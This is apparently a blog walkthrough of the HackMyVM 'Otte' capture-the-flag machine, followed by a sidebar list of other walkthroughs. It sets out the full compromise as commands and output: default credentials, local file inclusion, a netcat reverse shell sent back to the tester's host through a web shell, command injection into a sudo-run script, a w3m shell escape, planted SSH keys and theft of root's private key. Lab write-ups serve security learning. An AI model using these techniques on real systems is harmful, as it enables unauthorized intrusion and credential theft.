Visit port 80, need authentication.

[image-20210523214949625.png]

Following the hint, search default credentials of siemens router. (This step is hard for me because I never used siemens router)

https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/

After some failure, we get the correct credentials.

root zP2wxY4uE

Then we can scan folder and files.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log -U root -P zP2wxY4uE

 /index.php            (Status: 200) [Size: 28]
 /image                (Status: 200) [Size: 47076]
 /config.php           (Status: 200) [Size: 0]
 /thinkgeek.php        (Status: 200) [Size: 28]

Fuzz thinkgeek.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28

 000007535:   200        0 L      0 W        0 Ch        "file"

Try LFI.

 curl -u  root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'

 root:x:0:0:root:/root:/bin/bash
 ...
 thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
 ...
 laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
 cedric:x:1002:1002:,,,:/home/cedric:/bin/bash

Follow the hint of note.txt, fuzz /home/thomas/*.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 0

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload      
 =====================================================================

 000016344:   200        2 L      3 W        20 Ch       "shell"

Fuzz the parameter of shell.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 20

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload  
 =====================================================================

 000004959:   200        3 L      6 W        74 Ch       "command"

Visit shell.php, run reverse shell code.

http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash

In another terminal, listen to port 1234, and get reverse shell.

 ~ nc -nlvp 1234    
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59386.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@otte:/var/www/html$

In /home/thomas, get nightmare.txt.

 www-data@otte:/home/thomas$ ls -la
 ls -la
 total 100
 drwxr-xr-x 4 thomas thomas  4096 May 20 09:46 .
 drwxr-xr-x 5 root   root    4096 May 16 12:34 ..
 -rw------- 1 thomas thomas    50 May 20 09:46 .Xauthority
 lrwxrwxrwx 1 thomas thomas     9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r-- 1 thomas thomas   220 May 15 12:12 .bash_logout
 -rw-r--r-- 1 thomas thomas  3526 May 17 14:42 .bashrc
 drwxr-xr-x 3 thomas thomas  4096 May 15 14:00 .local
 -rw-r--r-- 1 thomas thomas   807 May 15 12:12 .profile
 drwx------ 2 thomas thomas  4096 May 17 09:35 .ssh
 -rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
 -rw-r--r-- 1 thomas thomas   122 May 15 14:56 nightmare.txt
 -rwxr-xr-x 1 thomas thomas    93 May 17 09:15 shell.php
 www-data@otte:/home/thomas$ cat nightmare.txt
 cat nightmare.txt
 who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
 www-data@otte:/home/thomas$

Download important_file to local machine, check file content, the header is corrupted.

 less important_file
 important_file  (press RETURN)
 00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....

...

Search IDHR on google, looks like it's an PNG file. Replace XXXX's with a normal PNG file header.

 head important_file  
 00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....
 00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&.....G>_..
 00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.

Use cyberchef to render the PNG file, get a QR code.

[image-20210523212230214.png]

Render the QR code, get an link.

[image-20210523212429143.png]

Visit https://eqrcode.co/a/SVxQdM, get password of thomas.

 thomas@otte:/home/laetitia$ sudo -l
 Matching Defaults entries for thomas on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User thomas may run the following commands on otte:
     (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *

Run simpler.py, when ask for IP, input shell command.

 thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
 ***********************************************
      _                 _
  ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
 / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
 \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
 |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                 |_|               |_|    |___/
                                 @ironhackers.es

 ***********************************************

 Enter an IP: $("/bin/bash")
 laetitia@otte:~$

This shell is not interactive, we need to run 'nc x.x.x.x xxxx -e /bin/bash' to get another reverse shell, which is interactive.

[image-20210523220810457.png]

Check sudo again, as laetitia.

 laetitia@otte:~$ sudo -l
 sudo -l
 Matching Defaults entries for laetitia on otte:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User laetitia may run the following commands on otte:
     (cedric) NOPASSWD: /usr/bin/w3m

Use php to create a temporary http server on local machine, use w3m visit port 80, and spawn a shell.

 sudo -u cedric /usr/bin/w3m http://192.168.56.150

Then run !/bin/bash, now we are user cedric.

[image-20210523221401950.png]

In /home/cedric/.ssh, upload id_rsa.pub.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys

Then we can login ssh as cedric.

Check sudo again.

 cedric@otte:~$ sudo -l
 Matching Defaults entries for cedric on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cedric may run the following commands on otte:
     (ALL : ALL) NOPASSWD: /usr/bin/mmwatch

After check code of mmwatch, we can read id_rsa of root through mmwatch.

 sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"

Then we can login ssh as root.

 root@otte:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 otte
 root@otte:~# ls -la /root
 total 40
 drwx------  4 root root 4096 May 20 10:30 .
 drwxr-xr-x 18 root root 4096 May 15 12:07 ..
 lrwxrwxrwx  1 root root    9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
 drwxr-xr-x  3 root root 4096 May 15 12:13 .local
 -rw-------  1 root root 1500 May 15 13:23 .mysql_history
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 -rwx------  1 root root   33 May 16 14:02 root.txt
 drwx------  2 root root 4096 May 16 13:24 .ssh
 -rw-r--r--  1 root root  173 May 15 12:19 .wget-hsts
 -rw-------  1 root root  100 May 20 10:30 .Xauthority

随想杂趣

The ideal of life is for ideal life

Vulnhub Pylington: 1 Walkthrough

Vulnhub Pylington: 1 Walkthrough

include <iostream>

include <string>

include <fstream>

HackMyVm Ginger Walkthrough

HackMyVm Ginger Walkthrough

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

HackMyVm Ripper Walkthrough

HackMyVm Ripper Walkthrough

HackMyVm Momentum2 Walkthrough

HackMyVm Momentum2 Walkthrough

HackMyVm Hidden Walkthrough

HackMyVm Hidden Walkthrough

Congratulations!!! you have reached the last level!
Good Luck! 😉

Vulnhub Prime (2021): 2 Walkthrough

Vulnhub Prime (2021): 2 Walkthrough

HackMyVm Broken Walkthrough

HackMyVm Broken Walkthrough

HackMyVm BlackWidow Walkthrough

HackMyVm BlackWidow Walkthrough

HackMyVm Deba Walkthrough

HackMyVm Deba Walkthrough

HackMyVm Otte Walkthrough

HackMyVm Otte Walkthrough

2025 年 1 月
一	二	三	四	五	六	日
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Vulnhub Pylington: 1 Walkthrough

include <iostream>

include <string>

include <fstream>

HackMyVm Ginger Walkthrough

``` ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

HackMyVm Ripper Walkthrough

HackMyVm Momentum2 Walkthrough

HackMyVm Hidden Walkthrough

Congratulations!!! you have reached the last level! Good Luck! 😉

Vulnhub Prime (2021): 2 Walkthrough

HackMyVm Broken Walkthrough

HackMyVm BlackWidow Walkthrough

HackMyVm Deba Walkthrough

HackMyVm Otte Walkthrough

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

Congratulations!!! you have reached the last level!
Good Luck! 😉